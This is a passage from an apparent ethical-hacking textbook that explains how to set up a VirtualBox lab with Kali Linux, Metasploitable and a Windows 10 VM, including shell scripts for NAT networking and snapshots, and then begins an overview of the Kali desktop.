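The same NAT Network can be created and attached to the lab machines from the command line, which is handy when rebuilding the lab on a new host. The script below is an added example, not code from the book or from VirtualBox; the network name LabNet, the 10.0.2.0/24 range, and the three VM names are assumptions to adjust for your own lab. It also parses the output of VBoxManage list natnetworks to confirm the network exists and is enabled:

```shell
#!/bin/sh
# Added example (not from the book): create VirtualBox's "NAT Network" from
# the command line and attach the lab VMs to it, then confirm it is enabled.
# The GUI equivalent is File | Preferences | Network | NAT Networks.
# Network name, address range, and VM names are assumptions for this lab.
# Usage: sh lab_net.sh setup      (with the VMs powered off)

NET_NAME=${NET_NAME:-LabNet}
NET_CIDR=${NET_CIDR:-10.0.2.0/24}

# Run VBoxManage only if it is installed; fail loudly otherwise.
vbm() {
    command -v VBoxManage >/dev/null 2>&1 || {
        echo "VBoxManage not found; is VirtualBox installed?" >&2
        return 127
    }
    VBoxManage "$@"
}

# Read `VBoxManage list natnetworks` output from stdin and succeed only if
# a network with the given name exists and is enabled. Records look like:
#   NetworkName:    LabNet
#   IP:             10.0.2.1
#   Network:        10.0.2.0/24
#   DHCP Enabled:   Yes
#   Enabled:        Yes
natnet_enabled() {
    awk -v want="$1" '
        /^NetworkName:/ { name = $2 }
        /^Enabled:/     { if (name == want && $2 == "Yes") found = 1 }
        END             { exit found ? 0 : 1 }
    '
}

# Create the network if needed (DHCP on, so guests get 10.0.2.x leases)
# and put each named VM's first adapter on it.
setup_lab_network() {
    if ! vbm list natnetworks | natnet_enabled "$NET_NAME"; then
        vbm natnetwork add --netname "$NET_NAME" --network "$NET_CIDR" \
            --enable --dhcp on || return 1
    fi
    for vm in "$@"; do
        vbm modifyvm "$vm" --nic1 natnetwork --nat-network1 "$NET_NAME" || return 1
    done
    vbm list natnetworks | natnet_enabled "$NET_NAME"
}

case "${1:-}" in
    setup) setup_lab_network "Kali-Linux" "Metasploitable" "MSEdge - Win10" ;;
esac
```

Run it once with the machines powered off; modifyvm refuses to change the adapter of a running VM. Afterwards every guest should pick up a 10.0.2.x address from the network's DHCP server and be able to reach the others.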
We can now click on OK and start our virtual machine. To start it, all we have to do is click on the Start button. Then, click inside the virtual machine and hit Enter; now we are inside the virtual machine:
Now it's asking us for the username; the default username is root, and the default password is that reversed, toor. (These defaults apply to the 2018-era images used in this book; Kali releases from 2020.1 onward ship with a user named kali and password kali instead.) Since we installed this using the ready-made image, we can just click on the green button, or go to View | Full-screen, and the screen will automatically resize to the size of our display.
Now, in the top right-hand corner of the screen, we should see a network icon, because we set this machine to use a NAT Network. If there is no network icon, the machine isn't connected to the NAT Network, and if we open the browser, we will see that it's not connected to the internet.
To fix this, move the mouse to the top of the screen to display the VirtualBox menus, go to Devices | Network, and click on Connect Network Adapter, as shown in the following screenshot:
We only have to do this once; from then on, the virtual machine will automatically connect to the NAT Network. Within a few seconds, a network icon appears, and if we click on it, we will see that we are connected to a wired network.
As we can see in the following screenshot, it says Wired Connected, so Kali thinks it's connected to a wired network:
Now, if we just click Try Again in the browser, we will see the internet working.
Don't be intimidated by this new operating system; we're going to go through the basics, and we're going to use it a lot. It's actually going to become very easy for you to use.
Also, like I said, you won't lose any functionality when you install Kali Linux as a virtual machine. It's actually better to install it as a virtual machine, because it's completely isolated from your computer, and it will be very easy to fix if things go wrong.
The second machine that we will use is Metasploitable. Metasploitable is another Linux machine, and you can think of it as the opposite of Kali. Kali is designed so that you can use it to hack into other devices, while Metasploitable is designed so that you hack into it; it exists for people who want to learn penetration testing. It ships with a large number of deliberate vulnerabilities, and we're going to use Kali Linux to hack into it. Therefore, this is going to be one of the target, or victim, machines.
You can download Metasploitable at https://information.rapid7.com/metasploitable-download.html.
You will end up with a ZIP file named metasploitable-linux-2.0.0.zip. Once you decompress it, you will get a directory; double-click it, and you'll see the following files:
So, we're going to create a new machine, through the following steps:
1. Click on New, name the machine Metasploitable, and change its type to Linux. Then, hit Next, and give it only 1 GB of RAM.
2. When asked about the hard disk, choose the option to use an existing virtual hard disk file instead of creating a new one. The reason is that the image we downloaded was built for VMware Player, and its .vmdk disk already contains a complete installation, so we import that disk rather than installing an operating system ourselves. Go into the Metasploitable directory and select the .vmdk file.
3. Click on Open, then on Create. We can now start the machine. This is what we will see when the machine is running:
We don't need to install anything, as we just imported a pre-made installation on a ready hard disk. It's now asking for the username, which is msfadmin; the password is the same. We are now logged in:
This machine only has a Terminal, and it warns you that you should never expose it to an external internet connection, because it is designed to be vulnerable. It lives only inside our lab, installed as a virtual machine on the NAT Network, so nobody outside the lab can reach it; that is the right way to use it. As mentioned previously, in later chapters, we're going to look at how to hack into this machine. Again, don't be intimidated by the Terminal; we're going to use it a lot, and we're going to learn it step by step.
If we want to turn this machine off, all we have to do is run sudo poweroff. After asking for the msfadmin password, the machine turns off:
The last machine that we're going to talk about installing is the Windows machine. This is just a normal Windows machine, with Windows 10. This is going to be another victim, and we are going to see how we can hack it. Again, we installed Metasploitable because it has a large number of vulnerabilities, and it's designed to be hacked into. It has a Terminal that is not very user friendly, and it doesn't really mimic a normal user. The Windows machine, on the other hand, will be used for scenarios that mimic a normal user, a user just using Windows to browse the internet or do whatever normal people do on their machines.
Microsoft has released free virtual machines that you can download and use; they are available on Microsoft's website at https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/.
So, we're going to create a new machine, through the following steps:
1. Make sure that you select which host operating system you have. If you have Windows, click on the Windows tab; if you have a Mac, click on the Mac tab, and so on.
2. From the drop-down boxes, select MSEdge on Win (10), and make sure to select the VirtualBox image. The other choices are for other virtualization platforms; at the moment, we're using VirtualBox for everything, so make sure you choose the VirtualBox image. You will get a ZIP file named MSEdge.Win10.VirtualBox.zip. Uncompress it, and you will get the file MSEDGE-Win10TH2.ova.
3. Double-click on the .ova file, and VirtualBox will ask you to import the machine; its settings have already been set up. Import it as it is, and modify the settings later if needed.
4. Before booting it, modify the settings and change the RAM to 2 GB. We can then start it. Windows starts straight away; it is a ready-made installation provided by Microsoft.
We now have a fully working Windows 10 machine, and this will be the third machine in our lab: our second victim, or target, machine.
Now that we've created our virtual machines, it would be a good idea to take snapshots of them. A snapshot allows us to store the state of the current virtual machine, so that we can go back or forward in time, to a certain state. We can think of snapshots as bookmarks—for example, we can take snapshots of the fresh installations of the operating systems, and, if we update, configure, or break something in the future, we can go back to the fresh installations, or go back to the factory settings. We can also go forward to the updated system from there. We can take a snapshot whenever we want, and go back and forth between states.
The following are the steps for taking snapshots:
1. Select the Kali Linux machine that we installed; it's very easy to create a snapshot of it. All you have to do is go to Snapshots and click on the camera icon on the icon bar at the top:
2. It will ask us to name the snapshot, so we will name it Fresh Install, and give it a description saying that it's a fresh snapshot, with no updates. It's always a good idea to give a meaningful name and description, so that in the future we can remember what the snapshot stands for:
3. Now click on OK, and the snapshot appears in the list, with the Current State beneath it. We can update or install programs, and even install libraries, and, if we break something and want to go back to the fresh install, we can select Fresh Install and restore it.
Now, we can go back to the machine details and start our virtual machine. Let's walk through an example. Create a new directory in Kali Linux; we'll call it test. Then suppose that we update the system. When we update, there is a good chance that some programs will not be as up to date as the libraries that get installed, and those programs might start having issues. If this happens, it is usually best to go back, or downgrade, to the state before the update.
All we have to do is go back to the fresh installation. We created the new directory to show that once you go back, everything returns to how it was before the changes were made. Turn off Kali and go back to the Snapshots view; we will see the Current State (the state that has been changed). If the update was successful, we can also take a snapshot called Updated System, including the date, with a description such as updated with no problems. After clicking on OK, we will see two snapshots: Fresh Install and Updated System.
If we have problems after updating, all we have to do is select the Fresh Install snapshot and click on the restore icon. If we now start the Kali machine, the test directory we created is gone; we are back to the fresh installation of Kali, exactly as it was when we took the snapshot.
Let's suppose that we have gone back to our fresh installation, and for some reason we want to return to the updated state, perhaps to try a fix we found online. To move forward to that state, select Updated System, click on Restore (without taking a snapshot of the current state in the restore dialog), and start the machine. We'll be back in the updated state, where the test directory exists.
As you can see, snapshots can be really useful. They let us bookmark the state of the operating system, so that we can keep different configurations and switch between them as we please. Snapshots are also really useful for the Windows machine, because the Microsoft image is a time-limited evaluation copy, and we can go back to our fresh installation of Windows if there are problems in the future.
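The same take/restore cycle can be scripted with VBoxManage so that all three lab machines are reset to Fresh Install before each exercise. The script below is an added example, not code from the book or from VirtualBox; the VM names are assumptions. It checks that the named snapshot actually exists by parsing VBoxManage snapshot list --machinereadable, and it powers a running VM off first, because VirtualBox will not restore a snapshot over a running machine:

```shell
#!/bin/sh
# Added example (not from the book): take, list, and restore VirtualBox
# snapshots for the whole lab from the command line, so every exercise can
# start from a known "Fresh Install" state. VM names are assumptions.
# Restoring requires the VM to be powered off, so a running VM is stopped first.
# Usage: sh lab_snap.sh take "Fresh Install"
#        sh lab_snap.sh restore "Fresh Install"
#        sh lab_snap.sh list

LAB_VMS='Kali-Linux
Metasploitable
MSEdge - Win10'

# Run "$@" once per VM, appending the VM name (names may contain spaces).
for_each_vm() {
    printf '%s\n' "$LAB_VMS" | while IFS= read -r vm; do
        "$@" "$vm"
    done
}

# Read `VBoxManage snapshot <vm> list --machinereadable` from stdin and
# succeed if a snapshot with the given name exists. Lines look like:
#   SnapshotName="Fresh Install"
#   SnapshotUUID="..."
#   SnapshotName-1="Updated System"     (child snapshots get -1, -1-1, ...)
#   CurrentSnapshotName="Updated System"
snapshot_exists() {
    awk -F'"' -v want="$1" '
        /^SnapshotName(-[0-9]+)*=/ { if ($2 == want) found = 1 }
        END                        { exit found ? 0 : 1 }
    '
}

vm_running() {                    # $1 = VM
    VBoxManage showvminfo "$1" --machinereadable | grep -q '^VMState="running"'
}

take_snapshot() {                 # $1 = snapshot name, $2 = VM
    VBoxManage snapshot "$2" take "$1" --description "taken $(date +%Y-%m-%d)"
}

restore_snapshot() {              # $1 = snapshot name, $2 = VM
    if ! VBoxManage snapshot "$2" list --machinereadable | snapshot_exists "$1"; then
        echo "$2: no snapshot named '$1'" >&2
        return 1
    fi
    if vm_running "$2"; then
        VBoxManage controlvm "$2" poweroff
    fi
    VBoxManage snapshot "$2" restore "$1"
}

list_snapshots() {                # $1 = VM
    echo "== $1"
    VBoxManage snapshot "$1" list
}

case "${1:-}" in
    take)    for_each_vm take_snapshot "$2" ;;
    restore) for_each_vm restore_snapshot "$2" ;;
    list)    for_each_vm list_snapshots ;;
esac
```

Restoring discards the current state unless you snapshot it first, exactly as in the GUI dialog; take an Updated System snapshot before restoring if you want to be able to move forward again.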
In this chapter, we learned how to use VirtualBox, which allows us to install machines such as Kali Linux, and Windows, inside our own machine. We also learned how to install Kali Linux, which is going to be our attacking machine throughout the book, and how to install our victim machines, Windows and Metasploitable. Lastly, we studied what snapshots are, and how they can help us to retain our past setups in the virtual environment.
In upcoming chapters, we will see how to use the Kali Linux machine to attack both the Windows machine and the Metasploitable machine.
In this chapter, we will cover the basics of Kali Linux. We will see what Kali Linux looks like when installed as a virtual machine, and some of its basic elements will be explained in detail. Further into the chapter, we will learn about the different commands that we can use in a Linux Terminal. Once we have learned how to use the commands, we will see how to update sources and how to install programs on Linux.
In this chapter, we will cover the following topics:
Overview of Kali Linux
Linux commands
Updating sources
Now that we have Kali Linux installed, let me provide you with an overview of the system: what Linux is, the filesystems structure, and some of the basic apps that we are going to use. We will see an overview of the system now, and later, we will walk through some commands, which we will see in more detail in later chapters.
As you can see in the following screenshot, there is a status bar at the top, and at its left end there is an Applications menu that gives access to all of the applications that come preinstalled with Kali Linux. These are divided into categories according to the kind of work they are used for. We can see, for example, 01 – Information Gathering, 02 – Vulnerability Analysis, 03 – Web Application Analysis, 04 – Database Assessment, 07 – Reverse Engineering, and 08 – Exploitation Tools. These are all types of applications that can be used for penetration testing:
The Places menu allows you to access your filesystem, that is, the files that you will be using. This is similar to My Documents on Windows machines. If we click on Computer, we can access all of the files and devices, but we rarely use this menu; we usually get there through the Home icon on the vertical bar toward the left. If we go to Places and then Home, we get access to Desktop, Documents, Downloads, Music, and so on, the same way you would in Windows or macOS. We can even see Trash, which is where deleted files go. This is just a basic file manager, with back and forward buttons; double-click on a file to open it, or double-click on a directory to enter it:
To the right, there is an icon called Workspaces; in here, you can see the number of desktops, or workspaces. Linux usually supports workspaces, so you can have different windows on different workspaces; if you don't have other windows open, you can't use the next workspace. However, for example, if you have a file manager open here, you can go to the next workspace and it will be empty, and then you can have something else running there. You can use as many workspaces as you want, and it's easy to switch between them. We will be using them when we perform our penetration testing attacks.
Now, toward the right of the workspace icon, you can have a keyboard icon, if you have more than one keyboard and want to switch between them:
We then have our networks icon, as seen in the following screenshot. With it, we can access wired and wireless networks. One thing to note is that we will not be able to access our internal wireless card through a virtual machine. We have set the settings of the computer to be connected through NAT, which means that it has an internet connection, but the internet connection is coming through a host machine. So, there is actually a virtual network set up between this device and the main device. This device only has internet access because of the internet access provided by the main machine:
Here, we can also change the volume from the same menu; we can turn off the computer, lock it, or enter the preferences, too. These are just normal preferences; you should familiarize yourself with them. They include Backgrounds, Notifications, Displays, Mouse, and Networks. We then have battery settings, which can be accessed from the status bar. Applications and Places are the objects we'll be using the most, and you can access your network settings from them.
If we have a wireless card connected, we will be able to see the available networks. If we want to connect a wireless card (I have a USB wireless card), we can do the following:
1. Go to the Devices menu on the VirtualBox menu bar, then go to USB. This procedure is the same regardless of the USB device that you connect (wireless card, memory stick, and so on): go to Devices | USB, then select the device you want to pass through to the virtual machine. (USB 1.1 passthrough works out of the box; for USB 2.0 or 3.0 devices, the VM needs the matching USB controller, which requires the VirtualBox Extension Pack.)
2. In this case, we connected a wireless card whose chipset shows up as Ralink 802.11 n WLAN [0101]. Click on it, and the card is attached to the Kali machine and detached from the host:
3. Go to the wireless icon on the status bar, choose Select Network under Wi-Fi Not Connected, and pick a network. We can see the networks available around us and select any one to connect to; enter the password and connect normally, the way you would to any other network:
Even if we disconnect our wireless card now, we still have an internet connection, because our main machine (a Mac, for example) is connected to a network, and this virtual machine reaches the internet through the Mac via the internal virtual network. The browser that comes with Kali Linux is Firefox ESR, and we can go to Google to check that we have an internet connection.
These are not hacking commands; they're not penetration testing commands. They're just commands used in Linux that allow us to do different things on the operating system.
